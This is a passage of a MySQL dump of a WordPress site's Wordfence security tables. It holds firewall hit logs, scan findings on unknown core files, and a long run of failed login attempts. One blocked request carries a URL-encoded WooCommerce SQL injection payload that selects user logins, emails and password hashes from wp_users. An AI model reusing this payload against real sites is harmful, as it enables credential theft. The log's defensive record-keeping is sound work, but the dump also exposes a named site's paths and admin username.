Injection','{\"learningMode\":0,\"failedRules\":\"380\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"path\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"category\":\"sqli\",\"ssl\":1}'),(2410,1631517448.134034,1631517448.021800,'\0\0\0\0\0\0\0\0\0\0���JL�',0,403,0,0,0,'https://housing-today.co.uk/wp-json/wc/store/products/collection-data?calculate_attribute_counts%5B0%5D%5Btaxonomy%5D=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520%25253B%252500',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','blocked:waf','WooCommerce < 5.5.1 SQL Injection','{\"learningMode\":0,\"failedRules\":\"380\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"path\":\"L3dwLWpzb24vd2Mvc3RvcmUvcHJvZHVjdHMvY29sbGVjdGlvbi1kYXRh\",\"category\":\"sqli\",\"ssl\":1}');
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfhoover`
--
DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`owner` text DEFAULT NULL,
`host` text DEFAULT NULL,
`path` text DEFAULT NULL,
`hostKey` varbinary(124) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhoover`
--
LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfissues`
--
DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=614 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfissues`
--
LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (602,1631397543,1631397543,'new','knownfile',75,'bc0e1e98251a9ecbbbfd1638b3a60bff','44c9694bf8fafec3d3d15c94a2499d1e','Unknown file in WordPress core: wp-includes/pomo/pomo/entry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:31:\"wp-includes/pomo/pomo/entry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(603,1631397543,1631397543,'new','knownfile',75,'f0ca8859087c27712491046669d9090e','620c3ffdf68920e27a7834b774547252','Unknown file in WordPress core: wp-includes/pomo/pomo/mo.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/mo.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(604,1631397543,1631397543,'new','knownfile',75,'6c0d45deb56eb69f4100ab72b98d18a2','d11b3440081ddccd55bfdf2cc2a11901','Unknown file in WordPress core: wp-includes/pomo/pomo/plural-forms.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/plural-forms.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(605,1631397543,1631397543,'new','knownfile',75,'66fc81b51e18fb67e3ff8b11bd378ebe','a7b1d80a7b7c9a37dd357357f80720d4','Unknown file in WordPress core: wp-includes/pomo/pomo/po.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:28:\"wp-includes/pomo/pomo/po.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(606,1631397543,1631397543,'new','knownfile',75,'54b1379f429ead0b05c5679d25ddfe92','483fe8d0dc2f62591bc8c2efc2190bd8','Unknown file in WordPress core: wp-includes/pomo/pomo/streams.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/pomo/pomo/streams.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(607,1631397543,1631397543,'new','knownfile',75,'64bac185b3e6cab863ec6f49ca6a61e3','baaf322ae29febdddecae999f621ac77','Unknown file in WordPress core: wp-includes/pomo/pomo/translations.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/pomo/pomo/translations.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(612,1631537673,1631537673,'new','wfPluginUpgrade',50,'f643617981a963b32a87a02e858c5c2a','f643617981a963b32a87a02e858c5c2a','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.10 -> 4.1.12).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:6:\"4.1.10\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:76:\"/home/housing-today.co.uk/public_html/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:6:\"4.1.12\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(613,1631537673,1631537673,'new','wfPluginUpgrade',50,'1aaeddb80931bc57a3dd1f0326b268d0','1aaeddb80931bc57a3dd1f0326b268d0','The Plugin \"Yoast SEO\" needs an upgrade (16.9 -> 17.1).','You need to upgrade \"Yoast SEO\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:9:\"Yoast SEO\";s:9:\"PluginURI\";s:18:\"https://yoa.st/1uj\";s:7:\"Version\";s:4:\"16.9\";s:11:\"Description\";s:178:\"The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more. <cite>By <a href=\"https://yoa.st/1uk\">Team Yoast</a>.</cite>\";s:6:\"Author\";s:43:\"<a href=\"https://yoa.st/1uk\">Team Yoast</a>\";s:9:\"AuthorURI\";s:18:\"https://yoa.st/1uk\";s:10:\"TextDomain\";s:13:\"wordpress-seo\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:3:\"5.6\";s:11:\"RequiresPHP\";s:6:\"5.6.20\";s:9:\"UpdateURI\";s:0:\"\";s:5:\"Title\";s:42:\"<a href=\"https://yoa.st/1uj\">Yoast SEO</a>\";s:10:\"AuthorName\";s:10:\"Team Yoast\";s:10:\"pluginFile\";s:81:\"/home/housing-today.co.uk/public_html/wp-content/plugins/wordpress-seo/wp-seo.php\";s:10:\"newVersion\";s:4:\"17.1\";s:4:\"slug\";s:13:\"wordpress-seo\";s:5:\"wpURL\";s:43:\"https://wordpress.org/plugins/wordpress-seo\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfknownfilelist`
--
DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`path` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfknownfilelist`
--
LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflivetraffichuman`
--
DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`expiration` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`,`identifier`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflivetraffichuman`
--
LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflocs`
--
DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`ctime` int(10) unsigned NOT NULL,
`failed` tinyint(3) unsigned NOT NULL,
`city` varchar(255) DEFAULT '',
`region` varchar(255) DEFAULT '',
`countryName` varchar(255) DEFAULT '',
`countryCode` char(2) DEFAULT '',
`lat` float(10,7) DEFAULT 0.0000000,
`lon` float(10,7) DEFAULT 0.0000000,
PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflocs`
--
LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wflogins`
--
DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`hitID` int(11) DEFAULT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`fail` tinyint(3) unsigned NOT NULL,
`action` varchar(40) NOT NULL,
`username` varchar(255) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`UA` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`IP`,`fail`),
KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=978 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wflogins`
--
LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (1,5,1624365570.936975,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(2,8,1624368283.981693,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3,9,1624368285.742861,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4,10,1624369000.762087,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5,11,1624369001.748886,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6,13,1624369942.967620,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���8k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(7,14,1624369944.313444,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���8k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(8,16,1624371051.447894,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(9,17,1624371052.462648,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10,20,1624373193.305869,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��k�LF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(11,21,1624373194.549427,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��k�LF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(12,22,1624374219.342058,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(13,25,1624374426.067810,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��$A7\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(14,26,1624375450.261904,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���[m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(15,27,1624375450.486902,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���[m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(16,31,1624376551.289934,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(17,32,1624376552.676180,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(18,34,1624377644.445839,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(19,35,1624377646.287678,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(20,36,1624377862.410779,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(21,37,1624377863.307242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(22,38,1624377863.950878,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(23,39,1624377865.022868,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(24,40,1624377868.309080,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(25,41,1624377869.057689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(26,42,1624377879.718203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(27,43,1624377881.413519,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(28,44,1624377882.459284,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(29,45,1624377883.328485,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(30,46,1624377884.428974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(31,47,1624377885.540065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(32,47,1624377885.595766,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(33,48,1624377886.826159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(34,49,1624377887.991554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(35,50,1624377888.981325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(36,51,1624377890.392505,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(37,52,1624377895.326749,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(38,53,1624377896.551213,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(Ge;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(39,55,1624378015.225146,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(40,56,1624378016.410848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(41,57,1624378018.060742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(42,58,1624378019.092669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(43,59,1624378019.821290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(44,60,1624378020.870429,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(45,61,1624378021.830789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(46,62,1624378024.158423,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(47,63,1624378025.369229,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(48,64,1624378030.368139,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(49,65,1624378031.355325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(50,66,1624378033.135108,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(51,67,1624378034.388782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(52,67,1624378034.480707,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(53,68,1624378035.679883,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(54,68,1624378035.780853,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(55,69,1624378036.970348,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(56,70,1624378038.137200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, 